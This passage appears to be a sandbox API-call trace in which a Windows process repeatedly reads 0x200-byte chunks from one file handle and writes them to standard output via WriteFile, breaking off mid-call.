[0133.659] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.659] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.659] GetFileType (hFile=0x50) returned 0x1 [0133.659] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.659] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 
[0133.659] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.659] GetFileType (hFile=0x50) returned 0x1 [0133.659] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.659] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.659] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.659] GetFileType (hFile=0x50) returned 0x1 [0133.659] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.659] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.659] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.659] GetFileType (hFile=0x50) returned 0x1 [0133.659] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.659] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.660] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.660] GetFileType (hFile=0x50) returned 0x1 [0133.660] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.660] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.660] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.660] GetFileType (hFile=0x50) returned 0x1 [0133.660] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.660] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.660] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0133.660] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.660] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.660] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.660] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.660] GetFileType (hFile=0x50) returned 0x1 [0133.660] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.660] GetFileType (hFile=0x50) returned 0x1 [0133.660] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.660] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.660] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.660] GetFileType (hFile=0x50) returned 0x1 [0133.660] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.660] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.660] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.660] GetFileType (hFile=0x50) returned 0x1 [0133.660] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.661] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.661] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.661] GetFileType (hFile=0x50) returned 0x1 [0133.661] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.661] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.661] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.661] GetFileType (hFile=0x50) returned 0x1 [0133.661] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.661] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.661] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.661] GetFileType (hFile=0x50) returned 0x1 [0133.661] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.661] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.661] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.661] GetFileType (hFile=0x50) returned 0x1 [0133.661] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.661] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.661] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.661] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.661] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.661] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.661] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.661] GetFileType (hFile=0x50) returned 0x1 [0133.661] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.662] GetFileType 
(hFile=0x50) returned 0x1 [0133.662] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.662] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.662] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.662] GetFileType (hFile=0x50) returned 0x1 [0133.662] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.662] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.662] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.662] GetFileType (hFile=0x50) returned 0x1 [0133.662] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.662] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.662] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.662] GetFileType (hFile=0x50) returned 0x1 [0133.662] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.662] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.662] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.662] GetFileType (hFile=0x50) returned 0x1 [0133.662] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.662] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.663] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.663] GetFileType (hFile=0x50) returned 0x1 [0133.663] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0133.663] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.663] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.663] GetFileType (hFile=0x50) returned 0x1 [0133.663] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.663] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.663] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.663] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.663] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.663] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.663] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.663] GetFileType (hFile=0x50) returned 0x1 [0133.663] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.663] GetFileType (hFile=0x50) returned 0x1 [0133.663] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.663] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.663] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.663] GetFileType (hFile=0x50) returned 0x1 [0133.663] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.663] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, 
lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.663] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.663] GetFileType (hFile=0x50) returned 0x1 [0133.663] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.664] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.664] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.664] GetFileType (hFile=0x50) returned 0x1 [0133.664] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.664] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.664] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.664] GetFileType (hFile=0x50) returned 0x1 [0133.664] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.664] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.664] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.664] GetFileType (hFile=0x50) returned 0x1 [0133.664] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.664] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.664] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.664] GetFileType (hFile=0x50) returned 0x1 [0133.664] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.664] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, 
lpOverlapped=0x0) returned 1 [0133.664] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.664] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.664] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.664] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.665] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.665] GetFileType (hFile=0x50) returned 0x1 [0133.665] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.665] GetFileType (hFile=0x50) returned 0x1 [0133.665] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.665] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.665] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.665] GetFileType (hFile=0x50) returned 0x1 [0133.665] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.665] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.665] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.665] GetFileType (hFile=0x50) returned 0x1 [0133.665] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.665] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.665] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.665] GetFileType (hFile=0x50) returned 0x1 [0133.665] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.665] WriteFile (in: hFile=0x50, 
lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.665] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.665] GetFileType (hFile=0x50) returned 0x1 [0133.665] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.665] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.665] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.665] GetFileType (hFile=0x50) returned 0x1 [0133.665] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.666] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.666] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.666] GetFileType (hFile=0x50) returned 0x1 [0133.666] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.666] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.666] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.666] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.666] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.666] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.666] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.666] GetFileType (hFile=0x50) returned 0x1 [0133.666] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0133.666] GetFileType (hFile=0x50) returned 0x1 [0133.666] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.666] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.666] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.666] GetFileType (hFile=0x50) returned 0x1 [0133.666] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.666] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.666] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.666] GetFileType (hFile=0x50) returned 0x1 [0133.666] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.666] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.667] GetFileType (hFile=0x50) returned 0x1 [0133.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.667] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.667] GetFileType (hFile=0x50) returned 0x1 [0133.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.667] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.667] _get_osfhandle (_FileHandle=1) returned 0x50 
[0133.667] GetFileType (hFile=0x50) returned 0x1 [0133.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.667] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.667] GetFileType (hFile=0x50) returned 0x1 [0133.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.667] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.667] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.667] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.667] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.667] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.667] GetFileType (hFile=0x50) returned 0x1 [0133.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.667] GetFileType (hFile=0x50) returned 0x1 [0133.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.668] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.668] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.668] GetFileType (hFile=0x50) returned 0x1 [0133.668] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.668] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, 
lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.668] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.668] GetFileType (hFile=0x50) returned 0x1 [0133.668] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.668] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.668] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.668] GetFileType (hFile=0x50) returned 0x1 [0133.668] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.668] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.668] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.668] GetFileType (hFile=0x50) returned 0x1 [0133.668] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.668] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.668] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.668] GetFileType (hFile=0x50) returned 0x1 [0133.668] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.668] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.669] GetFileType (hFile=0x50) returned 0x1 [0133.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.669] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: 
lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.669] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.669] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.669] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.669] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.669] GetFileType (hFile=0x50) returned 0x1 [0133.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.669] GetFileType (hFile=0x50) returned 0x1 [0133.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.669] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.669] GetFileType (hFile=0x50) returned 0x1 [0133.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.669] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.669] GetFileType (hFile=0x50) returned 0x1 [0133.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.669] WriteFile (in: 